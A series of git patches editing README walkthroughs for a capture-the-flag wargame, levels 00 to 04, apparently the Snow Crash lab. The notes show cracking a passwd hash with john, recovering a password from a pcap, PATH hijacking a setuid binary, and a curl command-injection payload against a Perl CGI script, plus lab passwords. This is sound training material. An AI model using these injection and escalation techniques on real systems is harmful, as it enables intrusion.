From df11aa601f3927bcec4a83b5dfcea92fc88f8b8c Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 16:33:18 +0000 Subject: [PATCH 01/17] show READMEs daily --- README.mdx | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.mdx b/README.mdx index 2854845..a47a75c 100644 --- a/README.mdx +++ b/README.mdx @@ -29,7 +29,8 @@ Ideas - `id` `whoami` `id flag00` - we are level00 - another user flag00 has different permissions -- Let's compare their privileges: + +Let's compare privileges btw level00 and flag00: ```b > grep level00 /etc/passwd @@ -43,8 +44,7 @@ total 0 ls: cannot open directory /home/flag/flag00: Permission denied ``` -- `level00` has an empty Home directory -- Let's check if we have other files outside of Home +Let's check if we have other files outside of Home ```b > ls -l @@ -64,7 +64,7 @@ cdiiddwpgswtgt - `+` : forces `find` to run `cat` on many files at once -Decipher ___`cdiiddwpgswtgt`___ in python +Decipher _`cdiiddwpgswtgt`_ in python ```py a = ord('a') From 6f6963b3506f47e16d2b6e753f11c3d05c681477 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:35:49 +0100 Subject: [PATCH 02/17] Update README.mdx --- level00/README.mdx | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/level00/README.mdx b/level00/README.mdx index 06c5e90..714fec3 100644 --- a/level00/README.mdx +++ b/level00/README.mdx @@ -9,6 +9,13 @@ $ ssh level00@$(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}') -p 4242 # 00 +Login + +```b +> ssh level00@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: level00 +``` + Ideas - `ls` `pwd` From cdff689285b5796ab4894a233b1eb1f0a791bf33 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 16:36:05 +0000 Subject: [PATCH 03/17] show READMEs daily --- README.mdx | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/README.mdx b/README.mdx index a47a75c..8c5de05 100644 --- a/README.mdx +++ b/README.mdx @@ -22,6 +22,13 @@ $ ssh level00@$(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}') -p 4242 # 00 +Login + +```b +> ssh level00@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: level00 +``` + Ideas - `ls` `pwd` From 1455a7554cafc48a17855532a3103837b4aa0b31 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:53:53 +0100 Subject: [PATCH 04/17] Update README.mdx --- level01/README.mdx | 32 ++++++++++++++++++-------------- 1 file changed, 18 insertions(+), 14 deletions(-) diff --git a/level01/README.mdx b/level01/README.mdx index 8f7f8cc..e407b32 100644 --- a/level01/README.mdx +++ b/level01/README.mdx @@ -1,17 +1,29 @@ # 01 -- Legacy folder `/etc/passwd` +Login ```b -> cat /etc/passwd -> cat /etc/passwd | grep -i flag01 | awk -F: '{print $2}' +> ssh level01@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: x24ti5gi3x0ol2eh4esiuxias +``` + +Idea + +- Look at `/etc/passwd` + +```b +> grep -i flag01 /etc/passwd +flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash +> grep flag01 /etc/passwd | awk -F: '{print $2}' +42hDRfypTqqnw ### observation - 😀 if we have john we'll able to do: + if we have john as a cli tool we'll able to one of these: + > john --show <(grep flag01 /etc/passwd | awk -F: '{print $2}') > john --show <(cat /etc/passwd | grep -i flag01 | awk -F: '{print $2}') ``` -- Use `john` +- Download and use `john` ```b > wget https://download.openwall.net/pub/projects/john/contrib/macosx/john-1.8.0.9-jumbo-macosx_sse4.zip @@ -24,13 +36,5 @@ OR > ./do_john.sh -``` - -- token - -```b -> su flag01 -Password: abcdefg -> su level02 -> Password: f2av5il02puano7naaf6adaaf +> ?:abcdefg ``` From bac299fe222f01fa395c07c7e6ea40dbd203f205 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:54:05 +0100 Subject: [PATCH 05/17] Update README.mdx --- level01/README.mdx | 1 - 1 file changed, 1 deletion(-) diff --git a/level01/README.mdx b/level01/README.mdx index e407b32..5cfa69d 100644 --- a/level01/README.mdx +++ b/level01/README.mdx @@ -36,5 +36,4 @@ flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash OR > ./do_john.sh -> ?:abcdefg ``` From cfefff87fbf86a9816061efa072de66e7e108238 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:54:20 +0100 Subject: [PATCH 06/17] Update README.mdx --- level01/README.mdx | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/level01/README.mdx b/level01/README.mdx index 5cfa69d..5ac4739 100644 --- a/level01/README.mdx +++ b/level01/README.mdx @@ -7,9 +7,7 @@ Login > Password: x24ti5gi3x0ol2eh4esiuxias ``` -Idea - -- Look at `/etc/passwd` +Look at `/etc/passwd` ```b > grep -i flag01 /etc/passwd @@ -23,7 +21,7 @@ flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash > john --show <(cat /etc/passwd | grep -i flag01 | awk -F: '{print $2}') ``` -- Download and use `john` +Download and use `john` ```b > wget https://download.openwall.net/pub/projects/john/contrib/macosx/john-1.8.0.9-jumbo-macosx_sse4.zip From 11bcbd6673ce1db3652f8d68dac9da80da4d8577 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 16:54:35 +0000 Subject: [PATCH 07/17] show READMEs daily --- README.mdx | 29 +++++++++++++++-------------- 1 file changed, 15 insertions(+), 14 deletions(-) diff --git a/README.mdx b/README.mdx index 8c5de05..8959d68 100644 --- a/README.mdx +++ b/README.mdx @@ -83,18 +83,28 @@ for i in range(26): # 01 -- Legacy folder `/etc/passwd` +Login + +```b +> ssh level01@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: x24ti5gi3x0ol2eh4esiuxias +``` + +Look at `/etc/passwd` ```b -> cat /etc/passwd -> cat /etc/passwd | grep -i flag01 | awk -F: '{print $2}' +> grep -i flag01 /etc/passwd +flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash +> grep flag01 /etc/passwd | awk -F: '{print $2}' +42hDRfypTqqnw ### observation - 😀 if we have john we'll able to do: + if we have john as a cli tool we'll able to one of these: + > john --show <(grep flag01 /etc/passwd | awk -F: '{print $2}') > john --show <(cat /etc/passwd | grep -i flag01 | awk -F: '{print $2}') ``` -- Use `john` +Download and use `john` ```b > wget https://download.openwall.net/pub/projects/john/contrib/macosx/john-1.8.0.9-jumbo-macosx_sse4.zip @@ -109,15 +119,6 @@ OR > ./do_john.sh ``` -- token - -```b -> su flag01 -Password: abcdefg -> su level02 -> Password: f2av5il02puano7naaf6adaaf -``` - # 02 From a2d58bee9ba4593d927b413b32986b94ce163b2e Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:55:32 +0100 Subject: [PATCH 08/17] Update README.mdx --- level02/README.mdx | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/level02/README.mdx b/level02/README.mdx index dd7c1e1..26f5a28 100644 --- a/level02/README.mdx +++ b/level02/README.mdx @@ -1,5 +1,12 @@ # 02 +Login + +```b +> ssh level02@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: f2av5il02puano7naaf6adaaf +``` + - New stuff - `realpath` - get the full absolute filepath - `scp` - secure copy - `scp username@ip:path _local_` @@ -73,12 +80,3 @@ print('res/', res) # ft_waNDReL0L ``` - -- token - -```b -> su flag02 -Password: ft_waNDReL0L -> su level03 -> Password: kooda2puivaav1idi4f57q8iq -``` From 9557c1bbcbca6fdff7b916498fd22c12dfb982a5 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 16:55:46 +0000 Subject: [PATCH 09/17] show READMEs daily --- README.mdx | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/README.mdx b/README.mdx index 8959d68..f4e44a2 100644 --- a/README.mdx +++ b/README.mdx @@ -122,6 +122,13 @@ OR # 02 +Login + +```b +> ssh level02@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: f2av5il02puano7naaf6adaaf +``` + - New stuff - `realpath` - get the full absolute filepath - `scp` - secure copy - `scp username@ip:path _local_` @@ -196,15 +203,6 @@ print('res/', res) # ft_waNDReL0L ``` -- token - -```b -> su flag02 -Password: ft_waNDReL0L -> su level03 -> Password: kooda2puivaav1idi4f57q8iq -``` - # 03 From 51662fda925dd734e37540eba682ad069f70eb03 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:56:52 +0100 Subject: [PATCH 10/17] Update README.mdx --- level02/README.mdx | 20 +++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/level02/README.mdx b/level02/README.mdx index 26f5a28..8e3ccbd 100644 --- a/level02/README.mdx +++ b/level02/README.mdx @@ -7,12 +7,12 @@ Login > Password: f2av5il02puano7naaf6adaaf ``` -- New stuff - - `realpath` - get the full absolute filepath - - `scp` - secure copy - `scp username@ip:path _local_` - - `~.pcap` - a Packet Capture to store network packet data captured during network traffic monitoring +New stuff +- `realpath` - get the full absolute filepath +- `scp` - secure copy - `scp username@ip:path _local_` +- `~.pcap` - a Packet Capture to store network packet data captured during network traffic monitoring -- Save the `.pcap` to Host +Save the `.pcap` to Host ```b ### VM > ls -l @@ -22,7 +22,7 @@ Login > scp -P 4242 level02@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}'):/home/user/level02/level02.pcap $(pwd) ``` -- ❌ Inspect `.pcap` +❌ Inspect `.pcap` ```b ### Host @@ -32,9 +32,9 @@ Login > xxd level02.pcap | cut -d ' ' -f2-9 | tr -d ' ' ``` -- ✅ Use _Wireshark_ - - _Analyze - Follow - TCP Stream_ - - copy _`TCP Stream`_ to text +✅ Use _Wireshark_ +- _Analyze - Follow - TCP Stream_ +- copy _`TCP Stream`_ to text ```b 000000D6 00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Passw ord: @@ -64,6 +64,8 @@ Login - `7f` - DE - `0d` - CR +Parse the above block + ```py infile = [[n[-2], n[-1]] for n in [_.split() for _ in open(0).read().split('\n') if len(_.split()) == 3]] res = '' From 0c01c9063a85bfe66cde4f9f589ca02d01dea8d2 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 16:57:09 +0000 Subject: [PATCH 11/17] show READMEs daily --- README.mdx | 20 +++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/README.mdx b/README.mdx index f4e44a2..4d0ca73 100644 --- a/README.mdx +++ b/README.mdx @@ -129,12 +129,12 @@ Login > Password: f2av5il02puano7naaf6adaaf ``` -- New stuff - - `realpath` - get the full absolute filepath - - `scp` - secure copy - `scp username@ip:path _local_` - - `~.pcap` - a Packet Capture to store network packet data captured during network traffic monitoring +New stuff +- `realpath` - get the full absolute filepath +- `scp` - secure copy - `scp username@ip:path _local_` +- `~.pcap` - a Packet Capture to store network packet data captured during network traffic monitoring -- Save the `.pcap` to Host +Save the `.pcap` to Host ```b ### VM > ls -l @@ -144,7 +144,7 @@ Login > scp -P 4242 level02@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}'):/home/user/level02/level02.pcap $(pwd) ``` -- ❌ Inspect `.pcap` +❌ Inspect `.pcap` ```b ### Host @@ -154,9 +154,9 @@ Login > xxd level02.pcap | cut -d ' ' -f2-9 | tr -d ' ' ``` -- ✅ Use _Wireshark_ - - _Analyze - Follow - TCP Stream_ - - copy _`TCP Stream`_ to text +✅ Use _Wireshark_ +- _Analyze - Follow - TCP Stream_ +- copy _`TCP Stream`_ to text ```b 000000D6 00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Passw ord: @@ -186,6 +186,8 @@ Login - `7f` - DE - `0d` - CR +Parse the above block + ```py infile = [[n[-2], n[-1]] for n in [_.split() for _ in open(0).read().split('\n') if len(_.split()) == 3]] res = '' From 25ce324a9bf62d6dd39a357265525bc0b3a94859 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:57:36 +0100 Subject: [PATCH 12/17] Update README.mdx --- level03/README.mdx | 14 +++++++++++--- 1 file changed, 11 insertions(+), 3 deletions(-) diff --git a/level03/README.mdx b/level03/README.mdx index 3aa4197..abd2e92 100644 --- a/level03/README.mdx +++ b/level03/README.mdx @@ -1,8 +1,16 @@ # 03 -- Inspect - - ❌ `file` `readelf` `strings` - - ✅ `ltrace` +Login + +```b +> ssh level03@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: kooda2puivaav1idi4f57q8iq +``` + +Inspect +- ❌ `file` `readelf` `strings` +- ✅ `ltrace` + ``` > ls -l -rwsr-sr-x 1 flag03 level03 8627 level03 From 4c89535a2cf2d282e6159b4badf111396c31ecd5 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 17:57:47 +0100 Subject: [PATCH 13/17] Update README.mdx --- level03/README.mdx | 7 ------- 1 file changed, 7 deletions(-) diff --git a/level03/README.mdx b/level03/README.mdx index abd2e92..16bd35e 100644 --- a/level03/README.mdx +++ b/level03/README.mdx @@ -72,10 +72,3 @@ getflag: /bin/getflag > export PATH=/tmp:$PATH 👈 prepend tmp to get it checked first > ./level03 ``` - -- Token - -```b -> su level04 -> Password: qi0maab88jeaj46qoumi7maus -``` From 5d97a190ebc6c3b020cd42a424ca76286fde207a Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 16:58:02 +0000 Subject: [PATCH 14/17] show READMEs daily --- README.mdx | 21 +++++++++++---------- 1 file changed, 11 insertions(+), 10 deletions(-) diff --git a/README.mdx b/README.mdx index 4d0ca73..3008c9c 100644 --- a/README.mdx +++ b/README.mdx @@ -208,9 +208,17 @@ print('res/', res) # 03 -- Inspect - - ❌ `file` `readelf` `strings` - - ✅ `ltrace` +Login + +```b +> ssh level03@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: kooda2puivaav1idi4f57q8iq +``` + +Inspect +- ❌ `file` `readelf` `strings` +- ✅ `ltrace` + ``` > ls -l -rwsr-sr-x 1 flag03 level03 8627 level03 @@ -273,13 +281,6 @@ getflag: /bin/getflag > ./level03 ``` -- Token - -```b -> su level04 -> Password: qi0maab88jeaj46qoumi7maus -``` - # 04 - Todo: perl script problem - understand the `.pl` From c4b1bf7962b4c082980e0e803d7886bf7d14e53b Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 18:44:55 +0100 Subject: [PATCH 15/17] Update README.mdx --- level04/README.mdx | 45 ++++++++++++++++++++++++++++++++++----------- 1 file changed, 34 insertions(+), 11 deletions(-) diff --git a/level04/README.mdx b/level04/README.mdx index 79cd3db..fbcfacc 100644 --- a/level04/README.mdx +++ b/level04/README.mdx @@ -1,17 +1,40 @@ -# 04 - Todo: perl script problem -- understand the `.pl` -- know `2>&1` -```b -> nc -vz localhost 4747 - 👆 v: verbose - z: scan if a port is open -Connection to localhost 4747 port [tcp/*] succeeded! +# 04 -> curl localhost:4747/?x="\`/bin/getflag\`" +Login + +> ssh level04@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: qi0maab88jeaj46qoumi7maus + +We have a script and maybe it interacts w/ a webpage: + +```pl +#!/usr/bin/perl +# localhost:4747 +use CGI qw{param}; + # CGI (Common Gateway Interface) + # param: a CGI module func fetches params from HTTP requests + # qw: quote words +print "Content-type: text/html\n\n"; +sub x { + $y = $_[0]; + print `echo $y 2>&1`; + # sub -- define subroutine x + # $_[0] -- subroutine `x()` takes a single arg` + # print w/ backticks invokes a shell command + # 2>&1 -- combine stdout and stderr, & means 1 is a fd not a filename +} +x(param("x")); + # 1st `x` : calling the subroutine + # 2nd `x` : a query param + # x comes in form of "...?x=getflag" ``` -- token +Solution ```b -su level05 -> Password: ne2searoevaevoem4ov4ar8ap +> nc -vz localhost 4747 + ^ v: verbose, z: scan if a port is open (scanning listening daemons) +Connection to localhost 4747 port [tcp/*] succeeded! + +> curl localhost:4747/?x="\`/bin/getflag\`" ``` From 3da1839618dc13ffcf003ae4f61d051ef361584d Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 18:45:09 +0100 Subject: [PATCH 16/17] Update README.mdx --- level04/README.mdx | 2 ++ 1 file changed, 2 insertions(+) diff --git a/level04/README.mdx b/level04/README.mdx index fbcfacc..e07e27a 100644 --- a/level04/README.mdx +++ b/level04/README.mdx @@ -2,8 +2,10 @@ Login +```b > ssh level04@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 > Password: qi0maab88jeaj46qoumi7maus +``` We have a script and maybe it interacts w/ a webpage: From 255b51489d531edd0f3c135c1a10c5ec8b8c6f61 Mon Sep 17 00:00:00 2001 From: nuoxoxo Date: Sun, 17 Nov 2024 17:45:24 +0000 Subject: [PATCH 17/17] show READMEs daily --- README.mdx | 45 +++++++++++++++++++++++++++++++++++---------- 1 file changed, 35 insertions(+), 10 deletions(-) diff --git a/README.mdx b/README.mdx index 3008c9c..9d2ded3 100644 --- a/README.mdx +++ b/README.mdx @@ -282,22 +282,47 @@ getflag: /bin/getflag ``` -# 04 - Todo: perl script problem -- understand the `.pl` -- know `2>&1` +# 04 + +Login + ```b -> nc -vz localhost 4747 - 👆 v: verbose - z: scan if a port is open -Connection to localhost 4747 port [tcp/*] succeeded! +> ssh level04@$(ifconfig|grep 'inet '|awk 'NR==2 {print $2}') -p 4242 +> Password: qi0maab88jeaj46qoumi7maus +``` -> curl localhost:4747/?x="\`/bin/getflag\`" +We have a script and maybe it interacts w/ a webpage: + +```pl +#!/usr/bin/perl +# localhost:4747 +use CGI qw{param}; + # CGI (Common Gateway Interface) + # param: a CGI module func fetches params from HTTP requests + # qw: quote words +print "Content-type: text/html\n\n"; +sub x { + $y = $_[0]; + print `echo $y 2>&1`; + # sub -- define subroutine x + # $_[0] -- subroutine `x()` takes a single arg` + # print w/ backticks invokes a shell command + # 2>&1 -- combine stdout and stderr, & means 1 is a fd not a filename +} +x(param("x")); + # 1st `x` : calling the subroutine + # 2nd `x` : a query param + # x comes in form of "...?x=getflag" ``` -- token +Solution ```b -su level05 -> Password: ne2searoevaevoem4ov4ar8ap +> nc -vz localhost 4747 + ^ v: verbose, z: scan if a port is open (scanning listening daemons) +Connection to localhost 4747 port [tcp/*] succeeded! + +> curl localhost:4747/?x="\`/bin/getflag\`" ```